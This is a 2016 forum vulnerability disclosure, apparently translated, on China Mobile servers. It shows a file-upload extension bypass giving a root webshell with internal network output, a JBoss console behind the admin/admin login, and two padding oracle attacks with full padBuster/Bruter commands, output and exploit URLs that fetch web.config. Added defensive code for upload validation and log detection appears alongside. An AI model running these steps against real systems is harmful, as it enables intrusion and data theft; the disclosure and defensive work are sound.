HanDs
Administrator

[July vulnerability disclosure] Carrier security: multiple China Mobile vulnerabilities bundled (shell obtained, intranet roaming possible)



As per title.

Detailed description:

#1 File upload vulnerability

##1.1 Proof that the host belongs to China Mobile: http://**.**.**.**/profile/create, then click Register

1-1.png



##1.2 File upload: upload a jpg, intercept the request and change the extension to jsp, which bypasses the check

1-2.png
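The bypass in 1.2 works because the server trusts the extension supplied by the client once a client-side check has passed. As an added example (not code from the original report or from the affected site), this is a server-side validator that checks the extension against an allowlist, checks the file's leading bytes against that extension, rejects names with more than one dot, and assigns a server-chosen stored name so the client never controls the stored extension; the policy table and function names are assumptions.

```python
import os
import re
import secrets
from typing import Tuple

# Allowed image extensions and the leading magic bytes each must carry.
# Constructed policy for this example, not the vulnerable site's code.
ALLOWED = {
    "jpg": (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
    "png": (b"\x89PNG\r\n\x1a\n",),
    "gif": (b"GIF87a", b"GIF89a"),
}
SAFE_STEM = re.compile(r"^[A-Za-z0-9_-]{1,64}$")


def validate_upload(filename: str, content: bytes) -> Tuple[bool, str]:
    """Return (accepted, reason-or-extension).

    Rejects anything whose extension is not on the allowlist, whose bytes do
    not match that extension, or whose name carries extra dots or odd
    characters (shell.jsp.jpg, shell.jsp;.jpg style names)."""
    base = os.path.basename(filename)        # drop any path component
    parts = base.split(".")
    if len(parts) != 2 or not SAFE_STEM.match(parts[0]):
        return False, "bad filename"
    ext = parts[1].lower()
    magics = ALLOWED.get(ext)
    if magics is None:
        return False, "extension not allowed"
    if not any(content.startswith(m) for m in magics):
        return False, "content does not match extension"
    return True, ext


def stored_name(ext: str) -> str:
    """Server-chosen random name with the validated extension.

    The magic-byte check alone is not decisive (polyglot files exist), so the
    file must also land under a directory the app server does not execute
    JSP from; the random name removes the client's control over the path."""
    return f"{secrets.token_hex(16)}.{ext}"
```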



##1.3 Upload succeeded, shell obtained

http://**.**.**.**/data/images/2016/05/22/20160522105415_4611.jsp

Code block:
id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
whoami
root



Code block:
eth0      Link encap:Ethernet  HWaddr 00:50:56:8C:7D:53  
inet addr:**.**.**.** Bcast:**.**.**.** Mask:**.**.**.**
inet6 addr: fe80::250:56ff:fe8c:7d53/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:6135649371 errors:0 dropped:0 overruns:0 frame:0
TX packets:10647266306 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:952335725793 (886.9 GiB) TX bytes:13808412065401 (12.5 TiB)

eth1 Link encap:Ethernet HWaddr 00:50:56:8C:7D:54
inet addr:**.**.**.** Bcast:**.**.**.** Mask:**.**.**.**
inet6 addr: fe80::250:56ff:fe8c:7d54/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:62586 errors:0 dropped:0 overruns:0 frame:0
TX packets:5868 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:3901571 (3.7 MiB) TX bytes:251248 (245.3 KiB)

lo Link encap:Local Loopback
inet addr:**.**.**.** Mask:**.**.**.**
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:16436 Metric:1
RX packets:362616740 errors:0 dropped:0 overruns:0 frame:0
TX packets:362616740 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:29881800131 (27.8 GiB) TX bytes:29881800131 (27.8 GiB)



Code block:
? (**.**.**.**) at 00:00:5E:00:01:54 [ether] on eth0
? (**.**.**.**) at 02:1F:A0:00:00:21 [ether] on eth0
? (**.**.**.**) at 00:25:9E:F4:39:35 [ether] on eth1
? (**.**.**.**) at 00:25:9E:F4:39:35 [ether] on eth0
? (**.**.**.**) at 02:16:3E:55:39:49 [ether] on eth0
? (**.**.**.**) at 7E:2C:0D:04:85:15 [ether] on eth0
? (**.**.**.**) at 00:50:56:8C:7D:51 [ether] on eth0
? (**.**.**.**) at 00:1F:A0:04:D4:5C [ether] on eth0
? (**.**.**.**) at 00:1F:A0:04:D4:AC [ether] on eth0
? (**.**.**.**) at 00:50:56:8C:7D:55 [ether] on eth0
? (**.**.**.**) at 02:16:3E:50:0E:A1 [ether] on eth0



1-3.png



#2 Anonymous access to the server admin backend

##2.1 http://**.**.**.**:3380/

1-4.png



1-5.png



##2.2 Entry via weak password

http://**.**.**.**:3380/admin-console/login.seam?conversationId=96

admin\admin

1-6.png



##2.3 Demonstrating impact

**.**.**.**:3380/is/index.jsp 023

Code block:
eth0      Link encap:Ethernet  HWaddr FA:16:3E:1E:6E:B8  
inet addr:**.**.**.** Bcast:**.**.**.** Mask:**.**.**.**
inet6 addr: fe80::f816:3eff:fe1e:6eb8/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:4026126721 errors:0 dropped:0 overruns:0 frame:0
TX packets:4603968084 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:1079154466212 (1005.0 GiB) TX bytes:1287649748420 (1.1 TiB)

lo Link encap:Local Loopback
inet addr:**.**.**.** Mask:**.**.**.**
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:16436 Metric:1
RX packets:569904 errors:0 dropped:0 overruns:0 frame:0
TX packets:569904 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:41959898 (40.0 MiB) TX bytes:41959898 (40.0 MiB)



Code block:
? (**.**.**.**) at fa:16:3e:24:51:c2 [ether] on eth0
? (**.**.**.**) at 00:00:5e:00:01:70 [ether] on eth0



1-7.png



#3 Two Padding Oracle Attacks

Both are linked from the http://**.**.**.**/ page, so I will not write them up separately; the corresponding IP is **.**.**.**

##3.1 http://**.**.**.**:8001/

Code block:
padBuster.pl http://**.**.**.**:8001/WebResource.axd?d=ZBdcbTkhb2X6pzycCd75eQ2 ZBdcbTkhb2X6pzycCd75eQ2 16 -encoding 3 -plaintext "|||~/web.config"



Code block:
INFO: The original request returned the following
[+] Status: 200
[+] Location: N/A
[+] Content Length: 21725

INFO: Starting PadBuster Encrypt Mode
[+] Number of Blocks: 1

INFO: No error string was provided...starting response analysis

*** Response Analysis Complete ***

The following response signatures were returned:

-------------------------------------------------------
ID# Freq Status Length Location
-------------------------------------------------------
1 1 500 3877 N/A
2 ** 255 500 5013 N/A
-------------------------------------------------------

Enter an ID that matches the error condition
NOTE: The ID# marked with ** is recommended : 2

Continuing test with selection 2

[+] Success: (138/256) [Byte 16]
[+] Success: (138/256) [Byte 15]
[+] Success: (249/256) [Byte 14]
[+] Success: (170/256) [Byte 13]
[+] Success: (20/256) [Byte 12]
[+] Success: (184/256) [Byte 11]
[+] Success: (87/256) [Byte 10]
[+] Success: (114/256) [Byte 9]
[+] Success: (192/256) [Byte 8]
[+] Success: (38/256) [Byte 7]
[+] Success: (205/256) [Byte 6]
[+] Success: (166/256) [Byte 5]
[+] Success: (60/256) [Byte 4]
[+] Success: (78/256) [Byte 3]
[+] Success: (163/256) [Byte 2]
[+] Success: (168/256) [Byte 1]

Block 1 Results:
[+] New Cipher Text (HEX): 342ec0b7794fb52ba8cd2187346d1376
[+] Intermediate Bytes (HEX): 4852bcc95638d04986ae4ee952047477

-------------------------------------------------------
** Finished ***

[+] Encrypted value is: NC7At3lPtSuozSGHNG0TdgAAAAAAAAAAAAAAAAAAAAA1
-------------------------------------------------------



Code block:
Bruter.pl http://**.**.**.**:8001/ScriptResource.axd NC7At3lPtSuozSGHNG0TdgAAAAAAAAAAAAAAAAAAAAA1 16



Code block:
Total Requests:11117

Resulting Exploit Block:u2sJXBVvXn6B615ajjax9zQuwLd5T7UrqM0hhzRtE3YAAAAAAAAAAAAAAAAAAAAA0



Code block:
http://**.**.**.**:8001/ScriptResource.axd?d=u2sJXBVvXn6B615ajjax9zQuwLd5T7UrqM0hhzRtE3YAAAAAAAAAAAAAAAAAAAAA0



1-8.png



##3.2 http://**.**.**.**:8003/

Code block:
padBuster.pl http://**.**.**.**:8003/WebResource.axd?d=t6YDFzeBpU_Lvb8TVusVCg2 t6YDFzeBpU_Lvb8TVusVCg2 16 -encoding 3 -plaintext "|||~/web.config"



Code block:
INFO: The original request returned the following
[+] Status: 200
[+] Location: N/A
[+] Content Length: 21725

INFO: Starting PadBuster Encrypt Mode
[+] Number of Blocks: 1

INFO: No error string was provided...starting response analysis

*** Response Analysis Complete ***

The following response signatures were returned:

-------------------------------------------------------
ID# Freq Status Length Location
-------------------------------------------------------
1 1 500 3877 N/A
2 ** 255 500 5013 N/A
-------------------------------------------------------

Enter an ID that matches the error condition
NOTE: The ID# marked with ** is recommended : 2

Continuing test with selection 2

[+] Success: (139/256) [Byte 16]
[+] Success: (195/256) [Byte 15]
[+] Success: (236/256) [Byte 14]
[+] Success: (119/256) [Byte 13]
[+] Success: (86/256) [Byte 12]
[+] Success: (10/256) [Byte 11]
[+] Success: (31/256) [Byte 10]
[+] Success: (248/256) [Byte 9]
[+] Success: (70/256) [Byte 8]
[+] Success: (213/256) [Byte 7]
[+] Success: (129/256) [Byte 6]
[+] Success: (1/256) [Byte 5]
[+] Success: (236/256) [Byte 4]
[+] Success: (91/256) [Byte 3]
[+] Success: (225/256) [Byte 2]
[+] Success: (112/256) [Byte 1]

Block 1 Results:
[+] New Cipher Text (HEX): fc6cd767dc0344d12e859fc1eb7e5875
[+] Intermediate Bytes (HEX): 8010ab19f37421b300e6f0af8d173f74

-------------------------------------------------------
** Finished ***

[+] Encrypted value is: _GzXZ9wDRNEuhZ_B635YdQAAAAAAAAAAAAAAAAAAAAA1
-------------------------------------------------------



Code block:
Bruter.pl http://**.**.**.**:8003/ScriptResource.axd _GzXZ9wDRNEuhZ_B635YdQAAAAAAAAAAAAAAAAAAAAA1 16



Code block:
Total Requests:10684

Resulting Exploit Block:VdrNMIWsTTg3GATJ9Hom-_xs12fcA0TRLoWfwet-WHUAAAAAAAAAAAAAAAAAAAAA0



Code block:
http://**.**.**.**:8003/ScriptResource.axd?d=VdrNMIWsTTg3GATJ9Hom-_xs12fcA0TRLoWfwet-WHUAAAAAAAAAAAAAAAAAAAAA0



1-9.png
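The PadBuster runs in 3.1 and 3.2 show the traffic pattern a padding oracle leaves behind: hundreds of requests per byte to WebResource.axd or ScriptResource.axd, each with a different d= value, almost all answered with HTTP 500 (255 of 256 here, distinguishable only by response length), and over ten thousand requests in total. As an added example (not code from the original report), this is detection logic run over constructed access-log lines that flags a client whose error volume and ciphertext variety against those handlers fit that pattern; the thresholds, log format and sample addresses are assumptions.

```python
import re
from collections import defaultdict
from typing import Dict, List, Tuple

# Combined-log-style line: client, timestamp, request line, status, bytes.
LINE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>[^ ?]+)(?:\?(?P<query>\S*))? \S+" '
    r'(?P<status>\d{3}) (?P<size>\d+|-)'
)
# Handlers whose d= parameter is the encrypted blob an oracle attack tampers with.
ORACLE_PATHS = {"/WebResource.axd", "/ScriptResource.axd"}


def find_padding_oracle_probes(lines: List[str], min_errors: int = 50,
                               min_distinct: int = 50
                               ) -> Dict[Tuple[str, str], Tuple[int, int]]:
    """Map (client, path) -> (number of 500s, distinct d= values) for every
    client whose traffic to a handler looks like byte-by-byte padding probing
    rather than a browser loading the one resource it was linked to."""
    errors: Dict[Tuple[str, str], int] = defaultdict(int)
    distinct: Dict[Tuple[str, str], set] = defaultdict(set)
    for line in lines:
        m = LINE.match(line)
        if not m or m.group("path") not in ORACLE_PATHS:
            continue
        key = (m.group("client"), m.group("path"))
        if m.group("status") == "500":
            errors[key] += 1
        for kv in (m.group("query") or "").split("&"):
            if kv.startswith("d="):
                distinct[key].add(kv[2:])
    return {k: (errors[k], len(distinct[k])) for k in errors
            if errors[k] >= min_errors and len(distinct[k]) >= min_distinct}


def sample_log() -> List[str]:
    """Constructed traffic: one normal client, then one client working
    through all 256 guesses for a single byte (255 padding errors of one
    length, one accepted guess with a different length, all status 500)."""
    ts = "14/Jul/2016:10:00:01 +0800"
    lines = [f'10.0.0.9 - - [{ts}] "GET /WebResource.axd?d=ZBdcbTkhb2X6pzycCd75eQ2'
             f' HTTP/1.1" 200 21725']
    for i in range(256):
        size = 3877 if i == 137 else 5013
        lines.append(f'10.0.0.5 - - [{ts}] "GET /WebResource.axd?d=PROBE{i:03d}AAAA'
                     f' HTTP/1.1" 500 {size}')
    return lines
```

A client/path pair that trips both thresholds in a short window is worth an alert even before the patch is applied, because the byte-by-byte success counts above show the attack needs thousands of such requests to finish.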

Proof of vulnerability:

Proven above!

Remediation:

1. Padding Oracle vulnerability: install Microsoft's official patch;

2. File upload: redesign the upload handling and delete the webshell;

3. Reconfigure JBoss;

4. You are the experts here.


Floor #1
Posted: 2016-7-14   |   Views: 0   |   Replies: 0